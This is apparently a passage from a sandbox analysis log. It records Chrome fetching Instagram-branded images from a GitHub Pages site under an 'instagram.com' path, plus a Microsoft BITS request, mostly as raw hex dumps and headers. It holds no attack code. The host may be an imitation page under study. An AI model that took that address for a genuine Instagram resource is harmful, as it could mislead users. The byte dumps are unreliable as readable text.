                                                                                                                                                                                                                                Data Ascii: yOJ@LQ\=v7op}h3g\~Q.'~jsDN(\;$om|X'![8A_P==2qaP!=v)S!"mA<_D2d(aTn^uRQ29$w0}>{b!EI7\{D4|[onfXs'(&`q
                                                                                                                                                                                                                                2024-09-29 04:54:04 UTC1369INData Raw: be 1f f4 7a bd 1e 40 d2 2f e0 b1 c7 6e dd 32 c5 70 30 84 05 1e 0e f6 f7 9a 9e ed 78 22 ea 6d 07 41 a3 dd aa c3 dd a2 9f c0 e6 95 2b 57 e0 ce 38 49 40 ef 1f 1c 5f 1e 8f 2f c3 3b 95 1a 66 e3 f6 c6 56 a7 a3 da 35 6e bb 8d 46 04 49 32 26 66 74 63 66 46 44 df 97 2e 61 09 4b 74 13 a1 50 e7 83 4f 18 2c 1f 5b 55 66 6a b8 51 a6 32 53 53 6a 0d ae 34 7f 57 9b ca 34 83 24 25 df 0b b4 32 da 4c 4d 6e d4 ff bd 7f ff 3e a5 0f 19 3d a3 f4 fe 9f bf 0a b3 87 0c ac fb af fa f3 3f 7f d5 7d 0b d8 43 86 5f f5 e7 f0 f9 87 87 87 94 5e c2 f8 12 a5 87 0f be e6 7f 1c be da c2 97 30 7b 89 c1 d1 e1 d7 7c cd e1 11 b0 97 18 be 84 ad 57 1f fe 8f af 79 80 10 22 08 ad ed ba a6 81 5a a8 44 68 28 a0 8d 92 2b 9d e4 59 3e 0c 82 a0 6f 02 d2 c9 6c 3a a8 37 38 38 32 fb a9 a9 60 cf 93 91 2f a5 8c
                                                                                                                                                                                                                                Data Ascii: z@/n2p0x"mA+W8I@_/;fV5nFI2&ftcfFD.aKtPO,[UfjQ2SSj4W4$%2LMn>=?}C_^0{|Wy"ZDh(+Y>ol:7882`/
                                                                                                                                                                                                                                2024-09-29 04:54:04 UTC1369INData Raw: 0c 60 d8 9e 6c 36 ef fd a7 9d 9d 1d 25 5c 21 43 15 45 42 40 d0 dd 80 5a bd 33 1a 41 a7 5e 03 68 6d 8e 3d 8f fa 2d 19 38 b6 b4 6c e1 45 a1 90 71 e3 5e cb 7f de 03 6e 39 1e e7 4e cd fb 48 fd d7 5f 51 07 80 7a 1c d7 af 3b 37 1c 57 4a 37 7c f0 e0 c1 83 37 ce 7e 05 21 17 a1 f5 38 e2 ae e0 21 3c 82 ef 80 1f 82 5f 81 3f 80 bf c0 2e 56 38 41 68 98 eb 3c 9b 06 ca 5e 6e 26 66 12 34 57 a5 b9 49 4c b6 1c f2 b7 83 fc f6 c9 1d b9 4d 25 6b ca 4d 92 e7 0d d4 e5 c6 4a 6f 0f 5c e2 26 49 97 e7 2a 6e 22 63 f1 5f a3 cd 48 c5 5a 9b db 0c e4 27 1d a5 dc 24 6b ba 11 1f a9 9b 98 52 6d 22 ce 93 1d 5d 6d 62 25 8a 97 b4 89 d4 b2 2f f4 ed 87 7c 0c ab b7 83 d5 ed 51 67 a4 f4 63 77 ac c7 45 e2 6b 82 ca 8c f5 c8 68 13 17 e3 aa 32 65 a1 8d d4 6e 8e 8b a7 b9 d3 ca 4c 8a b2 6a e6 e6 ed 60
                                                                                                                                                                                                                                Data Ascii: `l6%\!CEB@Z3A^hm=-8lEq^n9NH_Qz;7WJ7|7~!8!<_?.V8Ah<^n&f4WILM%kMJo\&I*n"c_HZ'$kRm"]mb%/|QgcwEkh2enLj`
                                                                                                                                                                                                                                2024-09-29 04:54:04 UTC1369INData Raw: d0 84 a7 66 5e f4 f8 e6 06 c0 3d fb 97 61 6f ff f2 77 d9 ca 5e fa 2c 73 fa 60 0f 36 36 8f f3 27 57 cb 83 a7 e0 3f e0 92 86 26 4f d2 69 36 ad 4a 3e 82 19 6d 0a a3 d5 12 be e7 ef fe ee ef 1e db ff 3a ac bf f0 85 2f fc eb df fb 87 17 bc e0 05 8f 3d bd f7 7b db 77 3e f9 e4 93 ff f0 ad 3f fc c3 3f fc 7d 28 94 d0 97 b7 0e 7e 03 fe 09 7e 8f dc 47 c8 28 9f 97 e5 2c 7a c5 9b 29 d0 4f 14 2f 31 2b 96 16 c0 8b c2 05 f8 56 f3 d9 3c 9f 8b d2 38 cd c6 fa 92 00 be da f7 7d d3 ec 74 d7 ce 1e 3b d6 b2 91 da 8c 99 b5 b4 3b 40 4c 06 5d 44 d3 b6 19 a2 a1 95 61 78 9e e3 72 a4 a6 ef 3b 26 c5 c8 b3 4c 21 00 40 0a 4f 6a 37 08 e3 c8 b2 5d 89 cc b6 2c 0b 0c c3 94 ec 69 ed 6e 77 b4 b6 b6 d6 1f 38 51 bb 73 7a 98 77 9b a6 99 77 ba 61 a2 35 a0 0f c0 a5 12 8c c5 8d 46 ec 1b 3a f0 35 e5
                                                                                                                                                                                                                                Data Ascii: f^=aow^,s`66'W?&Oi6J>m:/={w>??}(~~G(,z)O/1+V<8}t;;@L]Daxr;&L!@Oj7],inw8Qszwwa5F:5


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                12192.168.2.449750185.199.109.1534432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:04 UTC382OUTGET /instagram.com/img/googleplay-button.png HTTP/1.1
                                                                                                                                                                                                                                Host: sayidanur.github.io
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:04 UTC720INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 10071
                                                                                                                                                                                                                                Server: GitHub.com
                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                permissions-policy: interest-cohort=()
                                                                                                                                                                                                                                Last-Modified: Mon, 22 Jul 2024 06:05:07 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31556952
                                                                                                                                                                                                                                ETag: "669df693-2757"
                                                                                                                                                                                                                                expires: Sun, 29 Sep 2024 05:04:04 GMT
                                                                                                                                                                                                                                Cache-Control: max-age=600
                                                                                                                                                                                                                                x-proxy-cache: MISS
                                                                                                                                                                                                                                X-GitHub-Request-Id: D2A5:BE5BC:27F31F4:2C6EE61:66F8DD68
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Age: 0
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:04 GMT
                                                                                                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                                                                                                X-Served-By: cache-nyc-kteb1890020-NYC
                                                                                                                                                                                                                                X-Cache: MISS
                                                                                                                                                                                                                                X-Cache-Hits: 0
                                                                                                                                                                                                                                X-Timer: S1727585644.418521,VS0,VE16
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Fastly-Request-ID: 1407a4b38f39ddc690b434a6eee53fb131c77b47
                                                                                                                                                                                                                                2024-09-29 04:54:04 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 34 00 00 00 a8 08 06 00 00 00 f7 b0 74 12 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 07 74 49 4d 45 07 e0 04 14 14 11 16 4c 49 4a c7 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 26 21 49 44 41 54 78 da ed 9d 0b 94 14 d5 99 c7 3b 71 54 04 24 83 82 12 45 19 04 71 78 c9 88 23 22 28 a2 88 02 22 21 e2 9a 75 25 c8 9a 95 43 30 0a 1b 44 d1 04 c4 cd 72 c0 28 ca 6b a3 49 60 f5 b8 89 21 bb 47 31 d1 18 4d 7c e0 fb 89 82 8a 3c e5 25 22 20 f2 1a 95 18 62 be ad 7f 33 35 29 8a ea aa 7b ab 6e 55
                                                                                                                                                                                                                                Data Ascii: PNGIHDR4tgAMAa cHRMz&u0`:pQ<pHYs.#.#x?vtIMELIJbKGD&!IDATx;qT$Eqx#"("!u%C0Dr(kI`!G1M|<%" b35){nU
                                                                                                                                                                                                                                2024-09-29 04:54:04 UTC1378INData Raw: a6 f2 55 fc 84 a6 58 c7 54 48 66 ea ea ea e4 a1 87 1e f2 14 14 e4 ad dc 72 cb 2d 79 b9 81 8c b8 a3 2d 7e 52 53 48 4a 11 19 d2 8d f0 50 68 08 a1 d0 84 8f ce 7c 7f 8a 34 7a 49 24 f7 82 ec 97 9a b7 16 78 ca 4c b3 d5 37 c8 91 ab 27 c8 91 6b 26 48 8b b5 37 4b af 4d 77 4b 8f 27 6e 92 23 da 1d cb 8b 20 63 3c fa e8 a3 07 45 5b 54 87 1f 00 3a 46 74 66 90 19 ec 2b ac 10 98 c2 1d 29 89 9a 93 62 e2 f8 e3 3c 26 c8 d1 67 9f 7d d6 b0 6f fc 7d fd fa f5 4a c9 b6 f6 30 23 f2 81 dc 32 5b 68 08 c9 d9 06 c8 9f 72 6e 10 37 0a 0d 21 14 9a 44 a8 fa d9 9f 24 f7 62 bd d0 d4 4b 4d e3 b7 17 14 94 99 a6 1f 58 ac 9d 20 4d d6 4d 90 e3 36 4e 96 be 5b e6 48 f5 ac ef 32 bf 26 23 20 fa e2 cc b9 40 67 88 a8 4b 98 99 2f 41 32 43 a1 31 7f 4c 5e e7 0f 82 a3 7b fe ae bd f6 da 83 a4 a6 d0 f9 74
                                                                                                                                                                                                                                Data Ascii: UXTHfr-y-~RSHJPh|4zI$xL7'k&H7KMwK'n# c<E[T:Ftf+)b<&g}o}J0#2[hrn7!D$bKMX MM6N[H2&# @gK/A2C1L^{t
                                                                                                                                                                                                                                2024-09-29 04:54:04 UTC1378INData Raw: f2 6b ba fc 61 2c f3 6b 12 18 7a 72 3e 39 db 9d 15 a2 2c 48 ee 74 77 6e 18 4a 40 02 29 3a 42 67 65 58 5b 66 ae bd f6 5a a5 ce 50 75 e9 03 9d e5 0f ca 4d 68 70 6e bc 84 01 c7 87 22 79 38 7f 5e 11 b5 7b ee b9 27 ff 3b 4e 19 c2 86 73 ea 27 43 61 da c0 1d 49 a2 d0 10 42 a1 89 ce 5b 12 8b d4 e4 2c a9 31 29 33 4e 5a ec be 4d 7a d6 cd 65 7e 4d 8c a0 53 44 02 a7 3b 52 63 77 5a e8 8c 9c b5 66 f0 ff ee 8e 10 1b ea d4 14 92 99 28 85 f5 b0 41 0a 28 34 fe 52 e3 75 4e 20 9c ce f3 87 da 40 ee 29 d5 f6 86 61 c3 a0 c8 4e d8 36 70 d7 a6 a1 d0 10 42 a1 89 c6 db 12 9f d4 ac 8b 4f 6a 40 be 7e cd 96 bb 99 5f 13 23 78 6a df b3 67 4f 28 e1 40 e7 16 54 0b 85 42 13 8f d0 d8 52 83 e1 27 dd 6a ce 76 b2 2e 84 48 65 98 2a 6c 1b e0 f8 dc c7 46 a1 21 84 42 13 4d 68 4a 58 6a 90 38 8c fc
                                                                                                                                                                                                                                Data Ascii: ka,kzr>9,HtwnJ@):BgeX[fZPuMhpn"y8^{';Ns'CaIB[,1)3NZMze~MSD;RcwZf(A(4RuN @)aN6pBOj@~_#xjgO(@TBR'jv.He*lF!BMhJXj8
                                                                                                                                                                                                                                2024-09-29 04:54:04 UTC1378INData Raw: 1f a9 41 12 6e 18 d9 b0 a7 5c eb 44 50 20 4e 10 1f d5 f7 cb ea d4 5c 42 a1 49 ab d0 60 f3 cb a9 a1 d0 50 68 8a 2f 34 19 96 9a bc cc 3c 5b 2f 33 69 12 9a d5 39 a9 5b 51 93 ea 9c 9a 30 c3 4c c8 6d 89 3a 13 09 ef 8b c8 8d 9f d8 50 66 28 34 14 9a e8 c2 80 ef 1a 1e 3c f0 bd d5 19 ea a5 d0 50 68 d2 f9 01 56 4b 66 a5 26 2f 33 cf 58 32 f3 54 2e 95 42 23 6b 2b 65 ec f7 d2 3b f4 a4 93 00 ac 3b 1b 22 4a 12 32 65 86 50 68 cc 0b 03 1e 44 54 1f 60 0a 7d 07 29 34 14 9a e2 0b 4d 06 a5 a6 41 66 fe 9c 4b af d0 ac c9 c9 4f 6f 49 e7 b0 13 a6 46 eb 44 65 e2 3c 16 dc 3c 29 33 84 42 93 8c 30 a8 44 6b 50 a7 86 42 43 a1 49 af d0 64 48 6a ee bf ee a7 b2 73 78 6f 91 47 2b 52 2f 34 93 ae 4b df 90 13 9e d4 4c 4f e7 34 91 98 4c 99 21 14 9a 64 84 41 25 52 e3 15 91 a5 d0 50 68 8a cb 1a
                                                                                                                                                                                                                                Data Ascii: An\DP N\BI`Ph/4<[/3i9[Q0Lm:Pf(4<PhVKf&/3X2T.B#k+e;;"J2ePhDT`})4MAfKOoIFDe<<)3B0DkPBCIdHjsxoG+R/4KLO4L!dA%RPh
                                                                                                                                                                                                                                2024-09-29 04:54:04 UTC1378INData Raw: d4 3d 97 93 15 0f e5 64 e2 bf 96 66 9e 0c 85 26 5c 67 66 4f 09 b5 c1 53 97 6e de 85 8a 38 e8 de d8 ed d9 1c ce 63 c3 ff eb 7e 3e d5 44 4d dd bc 05 f7 b1 a9 14 6e 4c 42 68 74 8e c3 9e 25 06 99 c3 7b 22 82 81 ff 57 6d 63 d3 89 c2 2a f2 ac 13 c5 0c 73 2d fb e5 d3 85 b9 d6 74 44 ca 9e 32 0f 70 4e ec 6b 5e e7 7b e3 ce fd c1 3d 21 e8 f5 61 72 08 55 1e 00 d2 b8 c0 6f e9 0b 4d 0a a5 e6 17 63 67 c8 17 96 cc 80 a2 48 cd 33 15 0d 42 b3 f7 85 9c 6c 7e 3c 27 73 6f 2c dd 3c 99 72 14 1a af 9b 85 ea 90 89 d7 d4 62 af 4e 5e 75 5a a9 ca 92 11 aa fb 42 67 1a 74 23 44 c7 ab da 51 61 7f 41 c3 23 aa fb c2 67 f0 13 24 7b d6 56 b1 84 46 35 3f 04 e7 2b a8 8d f1 73 95 8e d4 64 3e 4d b1 b7 a0 21 d4 30 42 03 d9 57 19 f6 09 6a 47 d5 f3 e1 15 15 09 92 2a ec d7 74 32 70 5a 0b 95 66 43
                                                                                                                                                                                                                                Data Ascii: =df&\gfOSn8c~>DMnLBht%{"Wmc*s-tD2pNk^{=!arUoMcgH3Bl~<'so,<rbN^uZBgt#DQaA#g${VF5?+sd>M!0BWjG*t2pZfC
                                                                                                                                                                                                                                2024-09-29 04:54:04 UTC1378INData Raw: 35 1b 6b ce 97 67 3b f6 94 7f 6b 79 02 65 c5 e0 d4 5e d3 09 b4 71 15 8a 73 de 6c 38 e4 14 cf 90 93 c9 1b 74 b1 87 9c 8a 95 e4 4b a1 d1 5b f2 03 6d 5f e8 33 e2 df f1 73 d5 29 f5 51 27 1d 38 ef 83 ba 09 f7 14 9a a4 84 26 26 a9 f9 2f 4b 66 76 d4 cb 4c 9c 52 f3 f1 69 fd e4 8d ce bd e5 47 c7 b7 97 6f 1c 72 28 45 25 a6 1a 31 c5 fa 72 86 ad a7 c2 a4 60 fd a4 e0 20 71 34 19 ad f3 6b b3 34 08 0d 8e 2f 0d c3 ad 59 13 1a 95 48 08 be ef ba 0f 51 78 9f a0 28 6e d4 72 02 ce 3c bd a0 e8 76 9a f2 0f cb 4f 68 0c 4b 4d 5e 66 4e bd c4 62 70 6c 52 f3 c9 69 17 ca d2 2e 7d 64 4e 9b ce cc 93 49 20 4a 53 ac 85 d5 54 a6 d0 7a e5 33 98 2a aa 56 8c 69 db a6 64 4b f7 29 52 45 b6 4c 5d 03 7e 6d 96 c4 b4 ed 42 1d 16 44 28 4d 25 ea b3 26 34 2a a2 19 f6 33 85 9d b6 ad f3 5d b6 8f 2d e8
                                                                                                                                                                                                                                Data Ascii: 5kg;kye^qsl8tK[m_3s)Q'8&&/KfvLRiGor(E%1r` q4k4/YHQx(nr<vOhKM^fNbplRi.}dNI JSTz3*VidK)REL]~mBD(M%&4*3]-
                                                                                                                                                                                                                                2024-09-29 04:54:04 UTC1378INData Raw: 9f 38 ee 53 14 1a 55 3e 14 6d a9 99 79 fd 6c d9 0c 99 b1 d1 94 9a 75 9d 06 c9 8b 27 9f 27 b7 b5 ea cc 3c 99 0c 89 4d 1c d1 0e d5 d9 26 26 96 7b 30 71 fc b8 89 9a ac 9c 1c 76 06 47 12 9d 2c ce 7b 94 08 87 53 ae 8a 29 34 ba b3 c2 a2 cc c8 a1 d0 f4 0d bc de a3 e4 37 e1 b5 f6 35 1e 87 d0 a8 94 7e 28 c5 a9 da d9 12 1a 0d a9 99 79 1d 64 e6 db f5 e8 49 cd a6 ce 83 e5 f5 0e fd e4 9e d6 dd a5 53 a3 66 94 81 8c 61 d7 90 89 9a 70 89 8e 0e 9d 6f d2 eb e9 e0 f8 21 36 61 22 36 71 af c6 8c 9b 24 c4 46 37 62 83 b6 44 04 22 ce 9b 2c 3e b7 ce 39 b7 cf af 53 ae 74 e5 04 d2 88 7f 2f 44 d8 21 35 dd cf e2 3c c6 24 f2 26 fc 3e b3 69 99 2e e6 f1 e9 9e 07 7c 67 dd f7 0b 5c 03 7e c7 12 c7 70 6b 29 16 d2 cb a6 d0 28 48 0d 64 e6 a3 ea 6f e7 d1 91 9a cd 9d 86 c8 d2 53 2e 92 ff 6d 73
                                                                                                                                                                                                                                Data Ascii: 8SU>mylu''<M&&{0qvG,{S)475~(ydISfapo!6a"6q$F7bD",>9St/D!5<$&>i.|g\~pk)(HdoS.ms
                                                                                                                                                                                                                                2024-09-29 04:54:04 UTC425INData Raw: 52 43 08 21 84 90 34 00 07 81 8b b8 d2 62 de 76 fb cb 41 42 83 a1 27 77 82 30 a5 86 10 42 08 21 c5 48 02 76 cb cc 8c 19 33 be 70 bb 8b a7 d0 80 e1 c3 87 7f c7 9d 4f 83 1d 32 a7 86 10 42 08 21 c5 c8 99 b1 65 06 81 17 65 a1 29 24 35 f6 ec 27 4e e9 26 84 10 42 48 5c 51 19 77 ad 19 80 d1 23 b8 49 21 6f 29 28 34 b6 d4 b8 87 9f 9c c5 f7 58 51 98 10 42 08 21 a6 12 7f 27 4d 9a 24 5e ce e1 17 99 51 12 1a 3b a7 c6 9d 28 ec 04 73 c2 21 37 58 a5 1b 82 03 18 c1 21 84 10 42 48 a1 24 5f db 17 e0 0e 18 f9 71 e7 c9 b8 13 80 83 64 46 49 68 9c 53 ba bd 86 a0 08 21 84 10 42 4c 83 11 22 f7 d4 6c 23 42 63 47 6b 50 51 b8 d0 30 14 21 84 10 42 48 54 91 41 10 45 c7 4f b4 85 c6 09 16 b4 c4 2a dd 94 1b 42 08 21 84 44 01 39 32 18 5a f2 4b fa 8d 4d 68 dc 91 1b 84 85 60 54 88 e0 10 42
                                                                                                                                                                                                                                Data Ascii: RC!4bvAB'w0B!Hv3pO2B!ee)$5'N&BH\Qw#I!o)(4XQB!'M$^Q;(s!7X!BH$_qdFIhS!BL"l#BcGkPQ0!BHTAEO*B!D92ZKMh`TB


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                13192.168.2.449754185.199.110.1534432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:05 UTC628OUTGET /instagram.com/img/insta-fav.ico HTTP/1.1
                                                                                                                                                                                                                                Host: sayidanur.github.io
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                Referer: https://sayidanur.github.io/instagram.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:05 UTC753INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 5430
                                                                                                                                                                                                                                Server: GitHub.com
                                                                                                                                                                                                                                Content-Type: image/vnd.microsoft.icon
                                                                                                                                                                                                                                permissions-policy: interest-cohort=()
                                                                                                                                                                                                                                x-origin-cache: HIT
                                                                                                                                                                                                                                Last-Modified: Mon, 22 Jul 2024 06:05:07 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31556952
                                                                                                                                                                                                                                ETag: "669df693-1536"
                                                                                                                                                                                                                                expires: Sun, 29 Sep 2024 05:03:06 GMT
                                                                                                                                                                                                                                Cache-Control: max-age=600
                                                                                                                                                                                                                                x-proxy-cache: MISS
                                                                                                                                                                                                                                X-GitHub-Request-Id: A29A:1664:12D80B6:1598F40:66F8DD32
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:05 GMT
                                                                                                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                                                                                                Age: 59
                                                                                                                                                                                                                                X-Served-By: cache-ewr-kewr1740058-EWR
                                                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                                                                                                X-Timer: S1727585646.685890,VS0,VE1
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Fastly-Request-ID: 6bde8e7c0e80aa8e225dbf7ed0a64d106f9cb525
                                                                                                                                                                                                                                2024-09-29 04:54:05 UTC1378INData Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 d2 fb 39 7d dd ff 72 85 de ff d7 86 e0 ff ff 80 da ff ff 78 d2 fe ff 6c c6 fe ff 5f b3 fd ff 55 9a fc ff 4f 78 f4 d8 54 52 ed 73 65 39 e0 3a 00 00 00 00 00 00 00 00 00 ff ff 01 55 b8 fb 81 64 ca ff fa 6f d6 ff ff 6a d1 ff ff 67 cd fe ff 63 c8 fe ff 5c bf fd ff 53 b1 fc ff 48 9c fb ff 40 80 f7 ff 42 62 f4 ff 57 4d f4 ff 6d 37 e5 fb 7a 2c d8 84 ff 00 ff 01 3b 96 f6 38 43 a4 fc fd 48 b0 fe ff 52 b8 fd ff 92 d6 fe ff b6 e4 ff ff bb e5 ff ff bb e2 fe ff b8 dc fe ff b2 d1 fd ff a8 c0 fb ff 85 90 f5 ff 5a
                                                                                                                                                                                                                                Data Ascii: h& ( t9}rxl_UOxTRse9:Udojgc\SH@BbWMm7z,;8CHRZ
                                                                                                                                                                                                                                2024-09-29 04:54:05 UTC1378INData Raw: 7b d8 fe ff 79 d6 fe ff 76 d3 fe ff 72 cf fe ff 6d ca fe ff 68 c4 fd ff 63 bc fd ff 5d b3 fc ff 57 a8 fc ff 52 9c fa ff 4e 8e f8 ff 4c 7e f5 ff 4c 6e f4 ff 51 5d f7 ff 58 4e f2 ff 60 42 e7 fd 6c 37 e3 cb 73 2f da 52 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 b9 fd 74 5f c4 fe fd 65 cb ff ff 66 ca ff ff 6a cd fe ff 6d cf fe ff 6f d1 fe ff 70 d1 fe ff 70 d1 fe ff 6f d0 fe ff 6d ce fe ff 6a cb fe ff 67 c6 fe ff 63 c1 fd ff 5e bb fd ff 59 b3 fc ff 54 a9 fc ff 4f 9e fb ff 4b 91 f9 ff 48 83 f6 ff 47 73 f4 ff 47 62 f1 ff 4c 52 ed ff 55 48 e9 ff 60 3e e5 ff 6f 35 e6 ff 78 2f e0 fe 7b 2e d9 7a 00 00 00 00 00 00 00 00 00 00 00 00 4a a8 f8 4c 4f b2 fe fd 52 b8 ff ff 56 bc fd ff 5a c0 fd ff 5d c4 fe ff 60 c6 fe ff 60 c7 fe ff 5d c6 fe ff 5a c4 fe
                                                                                                                                                                                                                                Data Ascii: {yvrmhc]WRNL~LnQ]XN`Bl7s/RVt_efjmoppomjgc^YTOKHGsGbLRUH`>o5x/{.zJLORVZ]``]Z
                                                                                                                                                                                                                                2024-09-29 04:54:05 UTC1378INData Raw: e2 ff a4 af f2 ff ff ff ff ff a5 b5 f6 ff 34 5b ec ff 3d 65 ef ff 3b 64 f0 ff 3d 62 f0 ff c8 d3 fb ff ff ff ff ff ed ef fe ff 95 9f f6 ff 65 71 f1 ff 68 6f f1 ff 9c 9b f4 ff f0 f0 fd ff ff ff ff ff cc c3 f8 ff 5f 33 e5 ff 68 2c e3 ff 6e 2b e1 ff 67 22 dd ff bf a3 f0 ff ff ff ff ff b7 92 eb ff 74 24 d6 ff 82 2f d8 ff 86 30 d6 ff 89 30 d4 ff 66 50 cd ff 60 53 d3 ff 59 56 d8 ff 4a 4e db ff aa ae f0 ff ff ff ff ff a6 ae f3 ff 3d 53 e7 ff 45 5c eb ff 3d 55 eb ff 87 95 f3 ff ff ff ff ff ed ee fd ff 63 6b ef ff 3a 42 eb ff 44 46 eb ff 48 42 ea ff 44 35 e7 ff 72 60 eb ff f1 ee fd ff ff ff ff ff 9a 73 eb ff 67 23 df ff 70 2b df ff 6a 22 db ff be a0 ef ff ff ff ff ff ba 96 eb ff 76 24 d5 ff 84 2f d7 ff 88 30 d5 ff 8c 2e d3 ff 71 47 c4 ff 6b 4a ca ff 64 4d d1 ff 54
                                                                                                                                                                                                                                Data Ascii: 4[=e;d=beqho_3h,n+g"t$/00fP`SYVJN=SE\=Uck:BDFHBD5r`sg#p+j"v$/0.qGkJdMT
                                                                                                                                                                                                                                2024-09-29 04:54:05 UTC1296INData Raw: 9c 2a bf ff a3 31 c0 ff a5 31 be ff a7 31 bd ff ae 3c 7c d3 af 3c 81 ff aa 3b 82 ff a6 38 85 ff a5 43 90 ff f3 e8 f2 ff ff ff ff ff b9 7e be ff 8d 27 99 ff 95 33 a7 ff 95 35 ad ff 94 35 b1 ff 93 34 b4 ff 92 33 b6 ff 90 33 b8 ff 8e 31 ba ff 8e 31 bb ff 8f 32 bd ff 91 31 be ff 91 2f be ff 90 2c bc ff b4 72 d0 ff bb 83 d3 ff 85 22 b1 ff b7 7d d1 ff ff ff ff ff f1 e3 f6 ff a2 38 be ff a2 2f bc ff a6 32 bb ff a8 32 ba ff ae 33 bc ff b3 3c 76 80 ba 3e 7d ff b0 3c 7c ff ad 3b 7f ff a4 32 7d ff cc 91 bb ff ff ff ff ff f9 f3 f8 ff bc 7f bc ff 98 38 9c ff 93 2d 9d ff 92 2c a1 ff 91 2b a5 ff 90 2a a8 ff 8f 29 ab ff 8f 28 ad ff 90 27 ae ff 91 26 b0 ff 91 25 b0 ff 91 25 b0 ff 8f 23 af ff 88 1c ab ff 8b 26 ad ff b9 7c ce ff fa f5 fb ff ff ff ff ff c8 87 d4 ff a0 29 b4
                                                                                                                                                                                                                                Data Ascii: *111<|<;8C~'3554331121/,r"}8/223<v>}<|;2}8-,+*)('&%%#&|)


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                14192.168.2.449755184.28.90.27443
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:06 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                Host: fs.microsoft.com
                                                                                                                                                                                                                                2024-09-29 04:54:06 UTC467INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                Server: ECAcc (lpl/EF67)
                                                                                                                                                                                                                                X-CID: 11
                                                                                                                                                                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                X-Ms-Region: prod-neu-z1
                                                                                                                                                                                                                                Cache-Control: public, max-age=129056
